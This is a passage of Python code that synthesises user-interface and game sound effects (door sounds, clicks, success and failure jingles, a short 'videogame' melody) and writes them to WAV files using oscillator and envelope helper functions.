adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
))))
w.write('dormindo91.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
))))
w.write('dormindo92.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
))))
w.write('porta_abre.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_abre4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i)))
w.write('porta_abre8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i)))
w.write('porta_fecha.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_fecha4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i *-1)))
w.write('porta_fecha7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i *-1)))
w.write('porta_fecha8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i *-1)))
w.write('clique.wav', f_a, N(n.array([0]*100+[1]+[0]*10000)))
w.write('clique2.wav', f_a, N(adsr(v(fv=20,d=.2),S=-3.)))
w.write('clique3.wav', f_a, N(adsr(v(fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique4.wav', f_a, N(adsr(v(f=1000.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique5.wav', f_a, N(adsr(v(f=660.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('seleciona.wav', f_a, N(adsr(v(f=460.,fv=1.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('seleciona2.wav', f_a, N(adsr(v(f=460.,fv=10.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela.wav', f_a, N(adsr(v(f=460.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela2.wav', f_a, N(adsr(v(f=40.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('msgPos.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg3.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos3.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos4.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(7./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg4.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('perda.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(-6./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
))))
w.write('ganho.wav', f_a, N(H((
adsr(v(f=840.*(2**(-7./12)),fv=0.,nu=0.,d=.1,tab=D_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1, tab=D_i),S=-3.,R=10.),
))))
w.write('ganho2.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.075, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.025, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=10.,A=5.,D=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.05, tab=D_i),S=-3.,R=5.,A=5.,D=10.),
))))
w.write('ganho3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.75, tab=D_i),S=-9.,R=10.,A=5.,D=610.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=10.,A=5., D=410.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.5, tab=D_i), S=-9.,R=5.,A=5., D=410.),
))))
w.write('ganho4.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(-7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho5.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganho6.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.175, tab=D_i),S=-9.,R=10.,A=5.,D=60.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda2.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda3.wav', f_a, N(H((
adsr(v(f=240.,fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=60.)+
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0.,d=.25, tab=D_i),S=-9.,R=10.,A=5.,D=210.),
))))
w.write('perda4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(3./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perda5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=10.,A=5., D=40.)+
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.105, tab=D_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('ganhoX3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)),fv=0. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=100. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=100.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=100. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=100. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('perdaX5.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)) , fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1/12.)), fv=200. ,nu=10., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=200.,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)), fv=200. ,nu=10.,d=.065, tab=D_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)), fv=200. ,nu=10.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.65, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065, tab=Q_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Q_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.65, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame2.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame3.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(6./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(-1./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*3, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(14/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(16/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(17./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(19./12.)),fv=0.,nu=0.,d=.065*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(12./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
))))
w.write('videogame4.wav', f_a, N(H((
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*4, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4./12.)),fv=0.,nu=0.,d=.0652*2, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(7/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(4/12.)),fv=0.,nu=0., d=.065, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(7./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0./12.)),fv=0.,nu=0.,d=.065, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
adsr(v(f=240.*(2.**(0/12.)),fv=0.,nu=0., d=.065*5, tab=Tr_i), S=-9.,R=10.,A=5., D=40.),
adsr(v(f=240.*(2.**(11./12.)),fv=0.,nu=0.,d=.065*3, tab=Tr_i), S=-9.,R=5.,A=5., D=40.),
